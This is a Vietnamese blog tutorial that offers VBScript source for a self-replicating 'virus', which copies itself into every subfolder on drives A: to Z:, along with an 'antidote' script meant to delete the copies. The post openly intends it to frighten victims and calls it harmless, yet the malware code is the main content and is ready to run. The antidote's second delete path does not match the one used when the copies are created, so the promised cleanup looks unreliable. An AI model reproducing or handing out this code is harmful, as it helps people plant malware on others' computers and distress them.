[TUT] SHARE CODE TẠO VIRUT XÂM NHẬP TẤT CẢ CÁC FOLDER CỦA MÁY | DEVA

Hello AE lâu lắm rồi mình mới share code ...Hôm nay mình xin được SHARE CODE TẠO VIRUT XÂM NHẬP TẤT CẢ CÁC FOLDER CÓ TRONG MÁY CỦA BẠN từ ổ C D E..gì thì cũng không thoát đâu..

Mục đích để người bị dính nó hoang mang lo sợ, muốn xóa cũng ko thể nào xóa hết đc. Làm sao có thể xóa được gần cả ngàn thư mục trong Windows ? Mà thư mục nào cũng có mặt Virus tất nhiên là mình có kèm theo cả thuốc giải :) . Chỉ cần chạy File thuốc giải là coi như xong, như chưa có chuyện gì xảy ra vậy.
=) An toàn và vô hại ..chủ yếu là đánh tinh thần


BƯỚC 1: Đầu tiên các bạn mở Notepad lên (start > Run > gõ > Notepad > enter).

BƯỚC 2 : TẠO VIRUTS :

- Copy đoạn code bên dưới và Past  vào Notepad vừa mở lên :

'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:\")
FolderList("B:\")
FolderList("C:\")
FolderList("D:\")
FolderList("E:\")
FolderList("F:\")
FolderList("G:\")
FolderList("H:\")
FolderList("I:\")
FolderList("J:\")
FolderList("K:\")
FolderList("L:\")
FolderList("M:\")
FolderList("N:\")
FolderList("O:\")
FolderList("P:\")
FolderList("Q:\")
FolderList("R:\")
FolderList("S:\")
FolderList("T:\")
FolderList("U:\")
FolderList("V:\")
FolderList("X:\")
FolderList("Y:\")
FolderList("Z:\")
FolderList("W:\")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus Boss!!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus Boss!!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub
BƯỚC 3 : Save lại bằng tên : thuocdoc.vbs
Khi nạn nhân chạy file này thì virus sẽ tràn ngập trong máy tính.
Và phần không thể thiếu là Thuốc Giải
BƯỚC 1 :Copy đoạn code bên dưới và Past  vào Notepad
'Thuoc Giai
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:\")
FolderList("B:\")
FolderList("C:\")
FolderList("D:\")
FolderList("E:\")
FolderList("F:\")
FolderList("G:\")
FolderList("H:\")
FolderList("I:\")
FolderList("J:\")
FolderList("K:\")
FolderList("L:\")
FolderList("M:\")
FolderList("N:\")
FolderList("O:\")
FolderList("P:\")
FolderList("Q:\")
FolderList("R:\")
FolderList("S:\")
FolderList("T:\")
FolderList("U:\")
FolderList("V:\")FolderList("X:\")
FolderList("Y:\")
FolderList("Z:\")
FolderList("W:\")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus Boss!!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---\Virus Boss!!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus Boss!!!!!!!.vbs")
fso.DeleteFile(f1.path & "---\Virus Boss!!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub
BƯỚC 2 : Save dưới tên thuocgiai.vbs
Chạy file này 1 lúc sẽ hết virut.
                                                                                                                  #copy ghi nguồn Deva Desiger

3 nhận xét: